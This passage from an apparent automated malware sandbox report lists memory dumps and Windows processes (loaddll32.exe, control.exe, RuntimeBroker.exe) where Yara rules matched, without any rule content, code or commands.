            Source: Yara matchFile source: 00000000.00000003.271814846.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271908704.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271854980.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.368074144.0000000002AC0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 4396, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 6996, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
            Source: Yara match